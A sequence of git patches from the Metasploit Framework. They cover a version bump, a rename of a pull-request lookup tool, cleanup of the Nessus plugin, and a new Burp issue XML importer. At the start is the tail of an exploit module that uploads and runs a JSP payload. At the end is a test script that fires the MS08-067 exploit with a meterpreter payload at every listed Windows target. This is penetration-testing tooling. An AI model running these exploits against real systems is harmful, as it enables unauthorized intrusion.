".jsp"}"/ + print_status("#{peer} - Payload uploaded successfully") + else + fail_with(Failure::Unknown, "#{peer} - Payload upload failed") + end + + print_status("#{peer} - Executing payload...") + send_request_cgi({ + 'uri' => normalize_uri(datastore['TARGETURI'], jsp_full_name), + 'method' => 'GET' + }) + handler + end +end From 37490a7b6b37644fcea3908b4b35d96d54d94a11 Mon Sep 17 00:00:00 2001 From: Adam Cammack <adam_cammack@rapid7.com> Date: Wed, 3 Feb 2016 18:16:20 -0600 Subject: [PATCH 266/686] Bump metasploit-payloads version Fix how Android meterpreter handles the timeout config generated by android/shell/reverse_tcp. Change Java meterpreters to return MAC address in `ifconfig` if the platform supports it. --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 1bcfd96d81..9037b236f5 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -13,7 +13,7 @@ PATH metasploit-concern (= 1.0.0) metasploit-credential (= 1.0.1) metasploit-model (= 1.0.0) - metasploit-payloads (= 1.0.22) + metasploit-payloads (= 1.0.23) metasploit_data_models (= 1.2.10) msgpack network_interface (~> 0.0.1) @@ -124,7 +124,7 @@ GEM activemodel (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) railties (>= 4.0.9, < 4.1.0) - metasploit-payloads (1.0.22) + metasploit-payloads (1.0.23) metasploit_data_models (1.2.10) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 104d24fbf7..5ec138df7b 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model', '1.0.0' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.0.22' + spec.add_runtime_dependency 'metasploit-payloads', '1.0.23' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. From d83d0ee633ed03fcd9897d7ec525036953dae010 Mon Sep 17 00:00:00 2001 From: Adam Cammack <adam_cammack@rapid7.com> Date: Wed, 3 Feb 2016 18:21:57 -0600 Subject: [PATCH 267/686] Update Ruby to 2.1.8 https://www.ruby-lang.org/en/news/2015/12/16/ruby-2-1-8-released/ Fixes a security flaw in Fiddle & DL. Also fixes some bugs. --- .ruby-version | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.ruby-version b/.ruby-version index 04b10b4f15..ebf14b4698 100644 --- a/.ruby-version +++ b/.ruby-version @@ -1 +1 @@ -2.1.7 +2.1.8 From 25a4e4b225928683a5e0051b6e411211df37431c Mon Sep 17 00:00:00 2001 From: Adam Cammack <adam_cammack@rapid7.com> Date: Wed, 3 Feb 2016 18:28:49 -0600 Subject: [PATCH 268/686] Update Travis to Ruby 2.1.8 --- .travis.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.travis.yml b/.travis.yml index 3e24267d3d..fe143187a5 100644 --- a/.travis.yml +++ b/.travis.yml @@ -25,7 +25,7 @@ script: - git diff --exit-code db/schema.rb && bundle exec rake $RAKE_TASKS sudo: false rvm: - - '2.1.7' + - '2.1.8' notifications: irc: "irc.freenode.org#msfnotify" From 8c8f4a39e8100954b794796b14b3c8ae8a25b887 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Wed, 3 Feb 2016 21:50:17 -0600 Subject: [PATCH 269/686] Change to file_pull_requests.rb --- ...pull_requests.rb => file_pull_requests.rb} | 24 +++++++++---------- 1 file changed, 12 insertions(+), 12 deletions(-) rename tools/modules/{module_pull_requests.rb => file_pull_requests.rb} (86%) diff --git a/tools/modules/module_pull_requests.rb b/tools/modules/file_pull_requests.rb similarity index 86% rename from tools/modules/module_pull_requests.rb rename to tools/modules/file_pull_requests.rb index d828c089f1..6c88b1419c 100755 --- a/tools/modules/module_pull_requests.rb +++ b/tools/modules/file_pull_requests.rb @@ -5,7 +5,7 @@ require 'net/http' require 'nokogiri' require 'optparse' -module ModulePullRequestCollector +module FilePullRequestCollector class Exception < RuntimeError; end @@ -30,7 +30,7 @@ module ModulePullRequestCollector commits = git_client.commits(repository, branch, path: path) if commits.empty? # Possibly the path is wrong. - raise ModulePullRequestCollector::Exception, 'No commits found.' + raise FilePullRequestCollector::Exception, 'No commits found.' end commits @@ -95,10 +95,10 @@ module ModulePullRequestCollector self.finder = PullRequestFinder.new(api_key) end - def search(module_name) - commits = finder.get_commits_from_file(module_name) + def search(file_name) + commits = finder.get_commits_from_file(file_name) pull_requests = finder.get_pull_requests_from_commits(commits) - puts "Pull request(s) associated with #{module_name}" + puts "Pull request(s) associated with #{file_name}" pull_requests.each_pair do |number, pr| puts "##{number} - #{pr[:title]}" end @@ -110,7 +110,7 @@ module ModulePullRequestCollector def self.banner %Q| This tool collects all the pull requests submitted to rapid7/metasploit-framework for a - particular module. It does not include history from SVN (what Metasploit used to use + particular file. It does not include history from SVN (what Metasploit used to use before Git). Usage: #{__FILE__} [options] @@ -141,8 +141,8 @@ module ModulePullRequestCollector options[:api_key] = v end - opts.on("-m", "--module <name>", "Module name") do |v| - options[:module] = v + opts.on("-f", "--file <name>", "File name") do |v| + options[:file] = v end opts.separator "" @@ -174,16 +174,16 @@ end if __FILE__ == $PROGRAM_NAME begin - opts = ModulePullRequestCollector::OptsParser.parse(ARGV) + opts = FilePullRequestCollector::OptsParser.parse(ARGV) rescue OptionParser::InvalidOption, OptionParser::MissingArgument => e puts "#{e.message} (please see -h)" exit end begin - cli = ModulePullRequestCollector::Client.new(opts[:api_key]) - cli.search(opts[:module]) - rescue ModulePullRequestCollector::Exception => e + cli = FilePullRequestCollector::Client.new(opts[:api_key]) + cli.search(opts[:file]) + rescue FilePullRequestCollector::Exception => e $stderr.puts e.message exit rescue Interrupt From c82c147f3144a8ee21ff0e6cef5917e77c51641e Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Wed, 3 Feb 2016 21:53:22 -0600 Subject: [PATCH 270/686] Correct usage example --- tools/modules/file_pull_requests.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/modules/file_pull_requests.rb b/tools/modules/file_pull_requests.rb index 6c88b1419c..990f2ffb03 100755 --- a/tools/modules/file_pull_requests.rb +++ b/tools/modules/file_pull_requests.rb @@ -116,7 +116,7 @@ module FilePullRequestCollector Usage: #{__FILE__} [options] Usage Example: - #{__FILE__} -k KEY -m modules/exploits/windows/browser/ms13_069_caret.rb + #{__FILE__} -k KEY -f modules/exploits/windows/browser/ms13_069_caret.rb How to obtain an API key (access token): 1. Go to github.com. From d5296d61501477af8a28ad51c9912ba2d7028a2b Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Wed, 3 Feb 2016 22:06:10 -0600 Subject: [PATCH 271/686] Add documentation --- tools/modules/file_pull_requests.rb | 42 +++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) diff --git a/tools/modules/file_pull_requests.rb b/tools/modules/file_pull_requests.rb index 990f2ffb03..b2791443e5 100755 --- a/tools/modules/file_pull_requests.rb +++ b/tools/modules/file_pull_requests.rb @@ -1,5 +1,14 @@ #!/usr/bin/env ruby +### +# +# This tool allows you to find all the pull requests for a particular file in the Metasploit +# repository. It does not include commit history from SVN. +# +# Author: sinn3r +# +### + require 'octokit' require 'net/http' require 'nokogiri' @@ -17,6 +26,10 @@ module FilePullRequestCollector attr_accessor :owner attr_accessor :git_access_token + # Initializes parameters. + # + # @param api_key [String] Personal access token from Github. + # @return [void] def initialize(api_key) self.owner = 'rapid7' self.repository = "#{owner}/metasploit-framework" @@ -26,6 +39,10 @@ module FilePullRequestCollector end # Returns the commit history of a file. + # + # @param path [String] A file path in the Metasploit repository. + # @return [Array<Sawyer::Resource>] An array of commits. + # @raise [FilePullRequestCollector::Exception] No commits found. Probably the file path is wrong. def get_commits_from_file(path) commits = git_client.commits(repository, branch, path: path) if commits.empty? @@ -36,6 +53,10 @@ module FilePullRequestCollector commits end + # Returns the author of a commit. + # + # @param commit [Sawyer::Resource] Commit. + # @return [String] def get_author(commit) if commit.author return commit.author[:login].to_s @@ -44,10 +65,19 @@ module FilePullRequestCollector '' end + # Checks if a author should be ignored or not. + # + # @param commit [Sawyer::Resource] Commit. + # @return [TrueClass] Author should be ignored + # @return [FalseClass] Author should not be ignored. def is_author_blacklisted?(commit) ['tabassassin'].include?(get_author(commit)) end + # Returns all found pull requests. + # + # @param commits [Array<Sawyer::Resource>] Commits + # @return [Hash] def get_pull_requests_from_commits(commits) pull_requests = {} @@ -63,6 +93,10 @@ module FilePullRequestCollector pull_requests end + # Returns the found pull request for a commit. + # + # @param commit [Sawyer::Resource] Commit + # @return [Hash] def get_pull_request_from_commit(commit) sha = commit.sha url = URI.parse("https://github.com/#{repository}/branch_commits/#{sha}") @@ -91,10 +125,18 @@ module FilePullRequestCollector attr_accessor :finder + # Initializes parameters. + # + # @param api_key [String] + # @return [void] def initialize(api_key) self.finder = PullRequestFinder.new(api_key) end + # Prints all the found PRs for a file. + # + # @param file_name [String] The file to look up. + # @return [void] def search(file_name) commits = finder.get_commits_from_file(file_name) pull_requests = finder.get_pull_requests_from_commits(commits) From ae38403bc29ec20c32f2cefeea8d3bd6f2990c4e Mon Sep 17 00:00:00 2001 From: RageLtMan <rageltman [at] sempervictus> Date: Thu, 4 Feb 2016 02:36:19 -0500 Subject: [PATCH 272/686] Remove empty print_status() lines Per Egypt's request and with Void-in's blessing, empty calls to print_status() are now removed. --- plugins/nessus.rb | 25 ------------------------- 1 file changed, 25 deletions(-) diff --git a/plugins/nessus.rb b/plugins/nessus.rb index 5d6280ca5e..97c67cb981 100644 --- a/plugins/nessus.rb +++ b/plugins/nessus.rb @@ -429,7 +429,6 @@ module Msf when '-h', '--help' print_status("nessus_server_properties") print_status("Example:> nessus_server_properties -S searchterm") - print_status() print_status("Returns information about the feed type and server version.") return when '-S', '--search' @@ -459,7 +458,6 @@ module Msf when '-h', '--help' print_status("nessus_server_status") print_status("Example:> nessus_server_status -S searchterm") - print_status() print_status("Returns some status items for the server..") return when '-S', '--search' @@ -484,7 +482,6 @@ module Msf when '-h', '--help' print_status("nessus_admin") print_status("Example:> nessus_admin") - print_status() print_status("Checks to see if the current user is an admin") print_status("Use nessus_user_list to list all users") return @@ -512,7 +509,6 @@ module Msf print_status("Example:> nessus_template_list scan -S searchterm") print_status("OR") print_status("nessus_template_list policy") - print_status() print_status("Returns a list of information about the scan or policy templates..") return when '-S', '--search' @@ -532,7 +528,6 @@ module Msf print_status("Example:> nessus_template_list scan") print_status("OR") print_status("nessus_template_list policy") - print_status() print_status("Returns a list of information about the scan or policy templates..") return end @@ -595,7 +590,6 @@ module Msf when '-h', '--help' print_status("nessus_scanner_list") print_status("Example:> nessus_scanner_list -S searchterm") - print_status() print_status("Returns information about the feed type and server version.") return when '-S', '--search' @@ -818,7 +812,6 @@ module Msf when '-h', '--help' print_status("nessus_report_host_ports <hostname> <report id>") print_status("Example:> nessus_report_host_ports 192.168.1.250 f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca -S searchterm") - print_status() print_status("Returns all the ports associated with a host and details about their vulnerabilities") print_status("Use nessus_report_hosts to list all available hosts for a report") return @@ -862,7 +855,6 @@ module Msf if args[0] == "-h" print_status("nessus_report_del <reportname>") print_status("Example:> nessus_report_del f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca") - print_status() print_status("Must be an admin to del reports.") print_status("Use nessus_report_list to list all reports") return @@ -899,7 +891,6 @@ module Msf when '-h', '--help' print_status("nessus_scan_list") print_status("Example:> nessus_scan_list -S searchterm") - print_status() print_status("Returns a list of information about currently running scans.") return when '-S', '--search' @@ -1017,7 +1008,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_pause <scan id>") print_status("Example:> nessus_scan_pause f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca") - print_status() print_status("Pauses a running scan") print_status("Use nessus_scan_list to list all available scans") return @@ -1045,7 +1035,6 @@ module Msf def cmd_nessus_db_scan(*args) if args[0] == "-h" print_status("nessus_db_scan <policy ID> <scan name> <scan description>") - print_status() print_status("Creates a scan based on all the hosts listed in db_hosts.") print_status("Use nessus_policy_list to list all available policies with their corresponding policy IDs") return @@ -1092,7 +1081,6 @@ module Msf if args[0] == "-h" print_status("nessus_db_import <scan ID>") print_status("Example:> nessus_db_import 500") - print_status() print_status("Use nessus_scan_list -c to list all completed scans") end if !nessus_verify_db @@ -1108,7 +1096,6 @@ module Msf print_status("Usage: ") print_status("nessus_db_import <scan ID>") print_status("Example:> nessus_db_import 500") - print_status() print_status("Use nessus_scan_list -c to list all completed scans") end if is_scan_complete(scan_id) @@ -1147,7 +1134,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_pause_all") print_status("Example:> nessus_scan_pause_all") - print_status() print_status("Pauses all currently running scans") print_status("Use nessus_scan_list to list all running scans") return @@ -1175,7 +1161,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_stop <scan id>") print_status("Example:> nessus_scan_stop f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca") - print_status() print_status("Stops a currently running scans") print_status("Use nessus_scan_list to list all running scans") return @@ -1205,7 +1190,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_stop_all") print_status("Example:> nessus_scan_stop_all") - print_status() print_status("stops all currently running scans") print_status("Use nessus_scan_list to list all running scans") return @@ -1233,7 +1217,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_resume <scan id>") print_status("Example:> nessus_scan_resume f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca") - print_status() print_status("resumes a running scan") print_status("Use nessus_scan_list to list all available scans") return @@ -1263,7 +1246,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_resume_all") print_status("Example:> nessus_scan_resume_all") - print_status() print_status("resumes all currently running scans") print_status("Use nessus_scan_list to list all running scans") return @@ -1447,7 +1429,6 @@ module Msf when '-h', '--help' print_status("nessus_plugin_list <Family ID> -S searchterm") print_status("Example:> nessus_plugin_list 10") - print_status() print_status("Returns a list of all plugins in that family.") print_status("Use nessus_family_list to display all the plugin families along with their corresponding family IDs") return @@ -1487,7 +1468,6 @@ module Msf when '-h', '--help' print_status("nessus_family_list") print_status("Example:> nessus_family_list -S searchterm") - print_status() print_status("Returns a list of all the plugin families along with their corresponding family IDs and plugin count.") return when '-S', '--search' @@ -1518,7 +1498,6 @@ module Msf when '-h', '--help' print_status("nessus_plugin_details <Plugin ID>") print_status("Example:> nessus_plugin_details 10264 -S searchterm") - print_status() print_status("Returns details on a particular plugin.") print_status("Use nessus_plugin_list to list all plugins and their corresponding plugin IDs belonging to a particular plugin family.") return @@ -1572,7 +1551,6 @@ module Msf when '-h', '--help' print_status("nessus_user_list") print_status("Example:> nessus_user_list -S searchterm") - print_status() print_status("Returns a list of the users on the Nessus server and their access level.") return when '-S', '--search' @@ -1644,7 +1622,6 @@ module Msf if args[0] == "-h" print_status("nessus_user_del <User ID>") print_status("Example:> nessus_user_del 10") - print_status() print_status("This command can only delete non admin users. You must be an admin to delete users.") print_status("Use nessus_user_list to list all users with their corresponding user IDs") return @@ -1731,7 +1708,6 @@ module Msf when '-h', '--help' print_status("nessus_policy_list") print_status("Example:> nessus_policy_list -S searchterm") - print_status() print_status("Lists all policies on the server") return when '-S', '--search' @@ -1765,7 +1741,6 @@ module Msf if args[0] == "-h" print_status("nessus_policy_del <policy ID>") print_status("Example:> nessus_policy_del 1") - print_status() print_status("You must be an admin to delete policies.") print_status("Use nessus_policy_list to list all policies with their corresponding policy IDs") return From 4dcbd7c1aebcfa83d16f9264cdcc95227a276d7f Mon Sep 17 00:00:00 2001 From: Brian Patterson <Brian_Patterson@rapid7.com> Date: Mon, 1 Feb 2016 16:11:06 -0600 Subject: [PATCH 273/686] Add a nokogiri xml stream parser for Burp issue xml and rename original burp parser to burp session parser so both are supported. --- lib/msf/core/db_manager/import.rb | 9 +- lib/msf/core/db_manager/import/burp_issue.rb | 20 +++ .../import/{burp.rb => burp_session.rb} | 2 +- lib/msf/ui/console/command_dispatcher/db.rb | 1 + lib/rex/parser/burp_issue_nokogiri.rb | 139 ++++++++++++++++++ lib/rex/parser/burp_session_nokogiri.rb | 2 +- lib/rex/parser/nokogiri_doc_mixin.rb | 5 + .../ui/console/command_dispatcher/db_spec.rb | 1 + 8 files changed, 175 insertions(+), 4 deletions(-) create mode 100644 lib/msf/core/db_manager/import/burp_issue.rb rename lib/msf/core/db_manager/import/{burp.rb => burp_session.rb} (96%) create mode 100644 lib/rex/parser/burp_issue_nokogiri.rb diff --git a/lib/msf/core/db_manager/import.rb b/lib/msf/core/db_manager/import.rb index c93fb6cb5b..c5a0e9d8d4 100644 --- a/lib/msf/core/db_manager/import.rb +++ b/lib/msf/core/db_manager/import.rb @@ -16,7 +16,8 @@ module Msf::DBManager::Import autoload :Acunetix, 'msf/core/db_manager/import/acunetix' autoload :Amap, 'msf/core/db_manager/import/amap' autoload :Appscan, 'msf/core/db_manager/import/appscan' - autoload :Burp, 'msf/core/db_manager/import/burp' + autoload :BurpIssue, 'msf/core/db_manager/import/burp_issue' + autoload :BurpSession, 'msf/core/db_manager/import/burp_session' autoload :CI, 'msf/core/db_manager/import/ci' autoload :Foundstone, 'msf/core/db_manager/import/foundstone' autoload :FusionVM, 'msf/core/db_manager/import/fusion_vm' @@ -41,7 +42,8 @@ module Msf::DBManager::Import include Msf::DBManager::Import::Acunetix include Msf::DBManager::Import::Amap include Msf::DBManager::Import::Appscan - include Msf::DBManager::Import::Burp + include Msf::DBManager::Import::BurpIssue + include Msf::DBManager::Import::BurpSession include Msf::DBManager::Import::CI include Msf::DBManager::Import::Foundstone include Msf::DBManager::Import::FusionVM @@ -267,6 +269,9 @@ module Msf::DBManager::Import elsif (data[0,1024] =~ /<!ATTLIST\s+items\s+burpVersion/) @import_filedata[:type] = "Burp Session XML" return :burp_session_xml + elsif (data[0,1024] =~ /<!ATTLIST\s+issues\s+burpVersion/) + @import_filedata[:type] = "Burp Issue XML" + return :burp_issue_xml elsif (firstline.index("<?xml")) # it's xml, check for root tags we can handle line_count = 0 diff --git a/lib/msf/core/db_manager/import/burp_issue.rb b/lib/msf/core/db_manager/import/burp_issue.rb new file mode 100644 index 0000000000..b043d32714 --- /dev/null +++ b/lib/msf/core/db_manager/import/burp_issue.rb @@ -0,0 +1,20 @@ +require 'rex/parser/burp_issue_nokogiri' + +module Msf::DBManager::Import::BurpIssue + def import_burp_issue_xml(args={}, &block) + bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : [] + wspace = args[:wspace] || workspace + parser = "Nokogiri v#{::Nokogiri::VERSION}" + noko_args = args.dup + noko_args[:blacklist] = bl + noko_args[:wspace] = wspace + if block + yield(:parser, parser) + doc = Rex::Parser::BurpIssueDocument.new(args,framework.db) {|type, data| yield type,data } + else + doc = Rex::Parser::BurpIssueDocument.new(args,self) + end + parser = ::Nokogiri::XML::SAX::Parser.new(doc) + parser.parse(args[:data]) + end +end diff --git a/lib/msf/core/db_manager/import/burp.rb b/lib/msf/core/db_manager/import/burp_session.rb similarity index 96% rename from lib/msf/core/db_manager/import/burp.rb rename to lib/msf/core/db_manager/import/burp_session.rb index aa5e2f54a8..cbed07fee3 100644 --- a/lib/msf/core/db_manager/import/burp.rb +++ b/lib/msf/core/db_manager/import/burp_session.rb @@ -1,6 +1,6 @@ require 'rex/parser/burp_session_nokogiri' -module Msf::DBManager::Import::Burp +module Msf::DBManager::Import::BurpSession def import_burp_session_noko_stream(args={},&block) if block doc = Rex::Parser::BurpSessionDocument.new(args,framework.db) {|type, data| yield type,data } diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index f3c36e8463..adf95b3f6a 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -1647,6 +1647,7 @@ class Db print_line " Amap Log -m" print_line " Appscan" print_line " Burp Session XML" + print_line " Burp Issue XML" print_line " CI" print_line " Foundstone" print_line " FusionVM XML" diff --git a/lib/rex/parser/burp_issue_nokogiri.rb b/lib/rex/parser/burp_issue_nokogiri.rb new file mode 100644 index 0000000000..c14ec9c869 --- /dev/null +++ b/lib/rex/parser/burp_issue_nokogiri.rb @@ -0,0 +1,139 @@ +# -*- coding: binary -*- +require "rex/parser/nokogiri_doc_mixin" +require 'uri' + +module Rex + module Parser + + # If Nokogiri is available, define Burp Issue document class. + load_nokogiri && class BurpIssueDocument < Nokogiri::XML::SAX::Document + + include NokogiriDocMixin + + def start_element(name=nil,attrs=[]) + attrs = normalize_attrs(attrs) + block = @block + @state[:current_tag][name] = true + case name + when "host", "name", "info", "issueDetail", "references" + @state[:has_text] = true + end + end + + def end_element(name=nil) + block = @block + case name + when "issue" + report_web_host_info + report_web_service_info + report_vuln + # Reset the state once we close a host + @state = @state.select {|k| [:current_tag].include? k} + when "host" + @state[:has_text] = false + collect_host_info + @text = nil + when "name" + @state[:has_text] = false + collect_name + @text = nil + when "issueDetail" + @state[:has_text] = false + collect_issue_detail + @text = nil + when "references" + @state[:has_text] = false + collect_references + @text = nil + end + @state[:current_tag].delete name + end + + def collect_host_info + return unless in_issue + return unless has_text + uri = URI(@text) + + @state[:host] = uri.host + @state[:service_name] = uri.scheme + @state[:proto] = "tcp" + + case @state[:service_name] + when "http" + @state[:port] = 80 + when "https" + @state[:port] = 443 + end + end + + def collect_name + return unless in_issue + return unless has_text + @state[:vuln_name] = @text + end + + def collect_issue_detail + return unless in_issue + return unless has_text + @state[:issue_detail] = @text + end + + def collect_references + return unless in_issue + return unless has_text + uri = @text.match('href=[\'"]?([^\'" >]+)')[1] + @state[:refs] = ["URI-#{uri}"] + end + + def report_web_host_info + return unless @state[:host] + address = Rex::Socket.resolv_to_dotted(@state[:host]) rescue nil + host_info = {:workspace => @args[:wspace]} + host_info[:address] = address + host_info[:name] = @state[:host] + db_report(:host, host_info) + end + + def report_web_service_info + return unless @state[:host] + return unless @state[:port] + return unless @state[:proto] + return unless @state[:service_name] + service_info = {} + service_info[:host] = @state[:host] + service_info[:port] = @state[:port] + service_info[:proto] = @state[:proto] + service_info[:name] = @state[:service_name] + @state[:service_object] = db_report(:service, service_info) + end + + def report_vuln + return unless @state[:service_object] + return unless @state[:vuln_name] + return unless @state[:issue_detail] + return unless @state[:refs] + vuln_info = {} + vuln_info[:service_id] = @state[:service_object].id + vuln_info[:host] = @state[:host] + vuln_info[:name] = @state[:vuln_name] + vuln_info[:info] = @state[:issue_detail] + vuln_info[:refs] = @state[:refs] + @state[:vuln_object] = db_report(:vuln, vuln_info) + end + + def in_issue + return false unless in_tag("issue") + return false unless in_tag("issues") + return true + end + + def has_text + return false unless @text + return false if @text.strip.empty? + @text = @text.strip + end + end + + end +end + diff --git a/lib/rex/parser/burp_session_nokogiri.rb b/lib/rex/parser/burp_session_nokogiri.rb index 2822fa28bf..057c5dae53 100644 --- a/lib/rex/parser/burp_session_nokogiri.rb +++ b/lib/rex/parser/burp_session_nokogiri.rb @@ -157,7 +157,7 @@ module Rex host_info = {:workspace => @args[:wspace]} host_info[:address] = @state[:web_site].service.host.address host_info[:name] = @state[:uri].host - report_db(:host, host_info) + db_report(:host, host_info) end def report_web_service_info diff --git a/lib/rex/parser/nokogiri_doc_mixin.rb b/lib/rex/parser/nokogiri_doc_mixin.rb index bfee26fa8c..9e59c56061 100644 --- a/lib/rex/parser/nokogiri_doc_mixin.rb +++ b/lib/rex/parser/nokogiri_doc_mixin.rb @@ -200,6 +200,11 @@ module Parser return attr_pairs end + # Removes HTML from a string + def strip_html_tags(text) + return text.gsub!(/(<[^>]*>)|\n|\t/s) {" "} + end + # This breaks xml-encoded characters, so need to append. # It's on the end_element tag name to turn the appending # off and clear out the data. diff --git a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb index 66a8edcde3..28605ad12b 100644 --- a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb +++ b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb @@ -340,6 +340,7 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do " Amap Log", " Amap Log -m", " Appscan", + " Burp Issue XML", " Burp Session XML", " CI", " Foundstone", From e6eaa138e58d0819c54202bbe52e1cba012a2b4f Mon Sep 17 00:00:00 2001 From: darkbushido <lance.sanchez@gmail.com> Date: Wed, 30 Dec 2015 14:57:41 -0600 Subject: [PATCH 274/686] working on automated testing of 08-067 --- config/cucumber.yml | 3 +- .../exploit/smb/ms08_067_netapi.feature | 189 ++---------------- features/support/targets.yml.example | 9 +- lib/tasks/custom_cucumber.rake | 6 + 4 files changed, 32 insertions(+), 175 deletions(-) diff --git a/config/cucumber.yml b/config/cucumber.yml index e3de143513..8cfb5f1a74 100644 --- a/config/cucumber.yml +++ b/config/cucumber.yml @@ -6,5 +6,6 @@ ignored_tags = "--tags ~@boot --tags ~@targets" %> default: <%= std_opts %> <%= ignored_tags %> features boot: <%= std_opts %> --tags @boot features +exploit: <%= std_opts %> --tags @targets features wip: --tags @wip:3 --wip features -rerun: <%= rerun_opts %> --format rerun --out rerun.txt --strict --tags ~@wip +rerun: <%= rerun_opts %> --format rerun --out rerun.txt --strict --tags ~@wip \ No newline at end of file diff --git a/features/modules/exploit/smb/ms08_067_netapi.feature b/features/modules/exploit/smb/ms08_067_netapi.feature index e23730be1c..9a9cf04ddf 100644 --- a/features/modules/exploit/smb/ms08_067_netapi.feature +++ b/features/modules/exploit/smb/ms08_067_netapi.feature @@ -1,181 +1,26 @@ -@wip +@targets Feature: MS08-067 netapi Background: Given a directory named "home" And I cd to "home" And a mocked home directory - Given I run `msfconsole` interactively - And I wait for stdout to contain "Free Metasploit Pro trial: http://r-7.co/trymsp" - Scenario: The MS08-067 Module should have the following options - When I type "use exploit/windows/smb/ms08_067_netapi" - And I type "show options" - And I type "exit" - Then the output should contain: + Scenario: The MS08-067 should get a session with bind_tcp + Given I ready the windows targets + And a file named "ms08-067.rc" with: """ - Module options (exploit/windows/smb/ms08_067_netapi): - - Name Current Setting Required Description - ---- --------------- -------- ----------- - RHOST yes The target address - RPORT 445 yes Set the SMB service port - SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) - - - Exploit target: - - Id Name - -- ---- - 0 Automatic Targeting - + <ruby> + hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml') + self.run_single('use exploit/windows/smb/ms08_067_netapi') + self.run_single('set payload windows/meterpreter/bind_tcp') + hosts['windows'].each do |host| + self.run_single("set RHOST #{host['ip']}") + self.run_single('run') + sleep 1 + end + + </ruby> """ - - Scenario: The MS08-067 Module should have the following advanced options - When I type "use exploit/windows/smb/ms08_067_netapi" - And I type "show advanced" - And I type "exit" - Then the output should contain: - """ - Module advanced options: - - Name : CHOST - Current Setting: - Description : The local client address - - Name : CPORT - Current Setting: - Description : The local client port - - Name : ConnectTimeout - Current Setting: 10 - Description : Maximum number of seconds to establish a TCP connection - - Name : ContextInformationFile - Current Setting: - Description : The information file that contains context information - - Name : DCERPC::ReadTimeout - Current Setting: 10 - Description : The number of seconds to wait for DCERPC responses - - Name : DisablePayloadHandler - Current Setting: false - Description : Disable the handler code for the selected payload - - Name : EnableContextEncoding - Current Setting: false - Description : Use transient context when encoding payloads - - Name : NTLM::SendLM - Current Setting: true - Description : Always send the LANMAN response (except when NTLMv2_session is - specified) - - Name : NTLM::SendNTLM - Current Setting: true - Description : Activate the 'Negotiate NTLM key' flag, indicating the use of - NTLM responses - - Name : NTLM::SendSPN - Current Setting: true - Description : Send an avp of type SPN in the ntlmv2 client Blob, this allow - authentification on windows Seven/2008r2 when SPN is required - - Name : NTLM::UseLMKey - Current Setting: false - Description : Activate the 'Negotiate Lan Manager Key' flag, using the LM key - when the LM response is sent - - Name : NTLM::UseNTLM2_session - Current Setting: true - Description : Activate the 'Negotiate NTLM2 key' flag, forcing the use of a - NTLMv2_session - - Name : NTLM::UseNTLMv2 - Current Setting: true - Description : Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key - is true - - Name : Proxies - Current Setting: - Description : A proxy chain of format type:host:port[,type:host:port][...] - - Name : SMB::ChunkSize - Current Setting: 500 - Description : The chunk size for SMB segments, bigger values will increase - speed but break NT 4.0 and SMB signing - - Name : SMB::Native_LM - Current Setting: Windows 2000 5.0 - Description : The Native LM to send during authentication - - Name : SMB::Native_OS - Current Setting: Windows 2000 2195 - Description : The Native OS to send during authentication - - Name : SMB::VerifySignature - Current Setting: false - Description : Enforces client-side verification of server response signatures - - Name : SMBDirect - Current Setting: true - Description : The target port is a raw SMB service (not NetBIOS) - - Name : SMBDomain - Current Setting: . - Description : The Windows domain to use for authentication - - Name : SMBName - Current Setting: *SMBSERVER - Description : The NetBIOS hostname (required for port 139 connections) - - Name : SMBPass - Current Setting: - Description : The password for the specified username - - Name : SMBUser - Current Setting: - Description : The username to authenticate as - - Name : SSL - Current Setting: false - Description : Negotiate SSL for outgoing connections - - Name : SSLCipher - Current Setting: - Description : String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH" - - Name : SSLVerifyMode - Current Setting: PEER - Description : SSL verification method (Accepted: CLIENT_ONCE, - FAIL_IF_NO_PEER_CERT, NONE, PEER) - - Name : SSLVersion - Current Setting: SSL3 - Description : Specify the version of SSL that should be used (Accepted: SSL2, - SSL3, TLS1) 